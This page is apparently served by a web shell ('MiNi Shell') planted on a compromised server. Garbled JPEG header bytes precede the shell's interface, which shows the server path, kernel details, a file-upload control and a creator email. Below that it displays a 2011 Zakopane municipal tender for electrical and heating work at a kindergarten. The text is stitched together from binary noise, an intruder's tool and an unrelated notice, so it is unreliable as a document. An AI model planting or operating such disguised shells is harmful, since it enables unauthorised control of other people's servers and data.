JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110202/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110202/38339-N-2011.html

<p class="kh_header"><b>Zakopane: ZP/341/142/10 Modernizacja instalacji elektrycznej i ogrzewania w budynku Przedszkola Nr 9 przy ul. Sabały 10 w Zakopanem</b><br>
<b>Numer ogłoszenia: 38339 - 2011; data zamieszczenia: 02.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/341/142/10 Modernizacja instalacji elektrycznej i ogrzewania w budynku Przedszkola Nr 9 przy ul. Sabały 10 w Zakopanem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Wykonanie robót budowlanych na zadaniu nr 33/09 Modernizacja instalacji elektrycznej i ogrzewania w budynku Przedszkola Nr 9 
przy ul. Sabały 10 w Zakopanem.

 Zakres robót obejmuje w szczególności wykonanie takich                       elementów jak:
a)	Rozdzielnica Główna RG, tablica pomiarowa TP, 
b)	Tablice bezpiecznikowe obiektowe,
c)	Wyłączenia pożarowe,
d)	Instalacja oświetlenia podstawowego, instalacja gniazd wtyczkowych 
oraz zasilania urządzeń technologicznych kuchni,
e)	Instalacja grzewcza obiektu,
f)	Instalacja oświetlenia awaryjnego i ewakuacyjnego,
g)	Instalacja siły,
h)	Instalacja ochrony przeciwporażeniowej,
i)	Instalacja ochrony przepięciowej,
j)	Poprawki malarskie po wykonaniu robót instalacyjnych, 


Wykonawcy    udzielą co najmniej 36-cio miesięcznej gwarancji na wykonane roboty budowlane objęte przedmiotowym zamówieniem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 46.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każdy wykonawca jest zobowiązany wnieść wadium przetargowe w wysokości  1500,00    zł  ( słownie:  jeden tysiąc pięćset złotych)

2.	Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
2) poręczeniach bankowych;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn.zm.).

3.	Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu Miasta Zakopane w PEKAO S.A. w Zakopanem nr: 85124047481111000048718666 Wadium powinno znajdować się na koncie zamawiającego najpóźniej w terminie składania ofert tj.21 luty 2011 r. do godz.  12°°
Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału, najpóźniej w terminie składania ofert tj.21 luty  2011 r.do godz. 12°° w  Biurze  ds. zamówień publicznych pok. nr 8 parter.
        
  UWAGA! Nie wolno oryginałów tych dokumentów wkładać do oferty.

ZWROT WADIUM : 
1.Zamawiający zwraca wadium  wszystkim wykonawcom niezwłocznie po wyborze oferty   najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza , z zastrzeżeniem ,że  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na   wezwanie, o którym mowa w art. 26 ust. 3ustawy  nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy,  lub pełnomocnictw, chyba że udowodni, że wynika to z  przyczyn nieleżących po jego stronie. 

2.Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy który wycofał 
ofertę przed upływem terminu składania ofert;
           3. Zamawiający żąda  ponownego wniesienia wadium przez wykonawcę którym zwrócono wadium na podstawie ust.1  jeżeli w wyniku  ostatecznego rozstrzygnięcia protestu jego oferta została  wybrana jako najkorzystniejsza. Wykonawca wnosi wadium  w terminie określonym przez Zamawiającego.
     4. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
    
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
         3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn    leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże , że w ciągu ostatnich 5 lat przed upływem terminu składania ofert  a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał co najmniej 2 roboty o zakresie odpowiadającym swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, tj. robót budowlanych o wartości nie mniejszej niż 50 000 zł każda, obejmujących budowę, przebudowę lub rozbudowę instalacji elektrycznej w budynku użyteczności publicznej

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  zostanie uznany za spełniony ,jeżeli  wykonawca wykaże  ,że zapewni kierowanie robotami  przez osobę posiadającą uprawnienia budowlane  bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych lub równoważne wydane na podstawie wcześniejszych przepisów, należące do właściwej Izby Inżynierów Budownictwa, 

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca  wykaże że posiada- środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż  50. 000,00 zł (słownie: pięćdziesiąt  tysięcy  złotych)  

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>rozliczenia ryczałtu. Przykładowy przedmiar dołączony przez Zamawiającego do materiałów przetargowych należy traktować, jako pomocniczy niezwalniający Wykonawcy od wykonania i załączenia  do oferty własnego wycenionego przedmiaru.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art. 144 Ustawy Prawo Zamówień Publicznych Zamawiający informuje, że zmiana postanowień w zawartej umowie może nastąpić w następujących przypadkach
1.	Zmiany danych teleadresowych, osób reprezentujących firmę, kluczowych
specjalistów (kierowników budowy, inspektorów nadzoru) przedstawionych
w umowie - na wniosek Zamawiającego lub Wykonawcy w postaci pisemnej
zgody Zamawiającego.
2.	Zmian podwykonawcy, przy pomocy którego Wykonawca realizuje
przedmiot umowy - na wniosek Wykonawcy w postaci pisemnej zgody
Zamawiającego.
3.	Rozszerzenia zakresu podwykonawstwa w porównaniu do wskazanego
w ofercie Wykonawcy - na wniosek Wykonawcy w postaci pisemnej zgody Zamawiającego.
4.Zmiany osoby -osób wskazanych w umowie, jako nadzorujących roboty -na wniosek Zamawiającego na inne legitymujące się, co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane

5.	Zmiany terminu wykonania umowy o czas opóźnienia, jeżeli takie
opóźnienie wystąpi lub będzie miało wpływ na wykonanie przedmiotu umowy
w przypadku
a) zawieszenia robót przez Zamawiającego,
                    b)zmian w dokumentacji dokonanych na wniosek Zamawiającego,
c)	opóźnienia przekazania terenu realizacji robót,
d)	zmiany terminu dokonania odbioru robót przewidzianych w umowie,
e)	odmiennych od przyjętych warunków technicznych w szczególności istnienia niezinwentaryzowanej sieci, instalacji lub innych niezinwentaryzowanych urządzeń i elementów budowlanych, uniemożliwiających realizacje zleconych robót,
f) siły wyższej,
g) przekroczenia ustawowych terminów wydania przez organy administracji iub
innych instytucji branżowych (dot. np. linii gazowych, telekomunikacyjnych,
energetycznych) decyzji, zezwoleń, uzgodnień, protokołów odbioru, itp.,
h)  odmowy wydania przez ww organy wymaganych decyzji, zezwoleń,
uzgodnień, protokołów odbioru itp.,
i) zmianę terminu wykonania zamówienia podstawowego o czas niezbędny
do wykonania zamówienia na dodatkowe roboty budowlane, od których zależy
wykonanie robót podstawowych, w przypadku zlecenia takich robót,
- na wniosek Zamawiającego lub Wykonawcy w postaci pisemnej zgody
Zamawiającego.
6.	Zmiany sposobu realizacji przedmiotu zamówienia w postaci
a)	konieczności realizacji zamówienia przy zastosowaniu innych rozwiązań technicznych technologicznych niż wskazane w dokumentacji projektowej i STWIOR, w przypadku gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem zamówienia,
b)	odmiennych od przyjętych w specyfikacjach warunków technicznych w szczególności istnienia niezinwentaryzowanej sieci, instalacji lub innych niezinwentaryzowanych urządzeń i elementów budowlanych skutkujących niemożnością zrealizowania przedmiotu zamówienia przy dotychczasowych założeniach technologicznych,

                 c)konieczności zrealizowania zamówienia przy zastosowaniu innych rozwiązań  
                    technicznych ze względu na zmiany obowiązującego prawa,
d)	zmian dokonanych w granicach przewidzianych w ustawie Prawo budowlane wynikających z:
- wprowadzenia    uzgodnionych    rozwiązań    zamiennych    w    stosunku
do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego,
- gdy zmiany dokonane zostały podczas wykonywania robót i nie odstępują
w sposób istotny od zatwierdzonego projektu lub warunków pozwolenia na budowę w ramach art. 36 a ust. 5 lub dokonane zostały zgodnie z zapisami art. 36 a ust. 6 ustawy z zastrzeżeniem art. 57 ust. 2 ustawy Prawo budowlane,
-wad    dokumentacji    projektowej    -        na    wniosek    Zamawiającego
lub Wykonawcy w postaci pisemnej zgody Zamawiającego.
7.	Zmiany wysokości wynagrodzenia - w wyniku rezygnacji z wykonania
części robót wraz z określeniem maksymalnej wielkości tych robót
i określeniem kwoty należnej za tą cześć w granicach udokumentowanego
interesu Zamawiającego w oparciu o odpowiadające pozycje wycenionego
przedmiaru robót załączonego do oferty przez Wykonawcę, - na wniosek
Inspektora Nadzoru Inwestorskiego w postaci pisemnej akceptacji Wykonawcy i Zamawiającego.
  8. Nie stanowi zmiany umowy w rozumieniu art. 144 Ustawy zmiana danych  
   związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana  
                        konta bankowego).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Rozwoju Lokalnego i Inwestycji pok. 20
Urząd Miasta Zakopane 
ul. Kościuszki 13
34-500 zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2011 godzina 12:00, miejsce: Biuro ds zamówień publicznych  pok. 8
Urząd Miasta Zakopane 
ul. Kościuszki 13
34-500 zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com